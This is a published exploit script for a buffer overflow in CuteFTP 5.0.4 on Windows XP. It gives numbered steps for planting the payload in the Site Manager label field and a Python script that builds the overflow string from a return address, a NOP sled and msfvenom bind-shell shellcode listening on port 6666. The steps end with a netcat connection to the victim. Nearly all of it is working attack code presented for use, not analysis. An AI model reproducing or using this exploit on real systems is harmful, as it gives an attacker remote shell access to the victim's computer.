# Exploit Title: CuteFTP 5.0 - Buffer Overflow # Author: Matteo Malvica # Date: 2018-08-26 # Vendor homepage: www.globalscape.com # Software: CuteFTP 5.0.4 XP - build 54.8.6.1 # Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe # Tested on: Windows XP Profesional SP3 English x86 # STEPS: # 1. The python script will generate an 'exploit.txt' file. # 2. Start CuteFTP # 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of # the exploit file into the 'label' field and provide a dummy IP addresss. # 4. Right click on the site name and 'create shortcut' # 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking. # 6. Quit CuteFTP and launch the newly created 'shortcut'.exe # 7. $ nc [target_ip] 6666 # 8. celebrate moderately ret="\xD8\xFC\x91\x7C" #ntdll.dll 7C91FCD8 nops = '\x90'*30 #msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python sc = "" sc += "\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33" sc += "\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb" sc += "\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9" sc += "\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3" sc += "\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41" sc += "\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e" sc += "\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40" sc += "\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95" sc += "\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33" sc += "\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4" sc += "\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5" sc += "\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75" sc += "\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53" sc += "\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b" sc += "\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b" sc += "\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35" sc += "\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01" sc += "\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82" sc += "\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6" sc += "\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a" sc += "\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32" sc += "\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7" sc += "\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48" sc += "\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80" sc += "\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10" sc += "\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6" sc += "\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9" sc += "\x39\xe3\x33\xf8" buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc)) payload = buffer try: f=open("exploit.txt","w") print "[+] Creating %s recreational bytes..." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"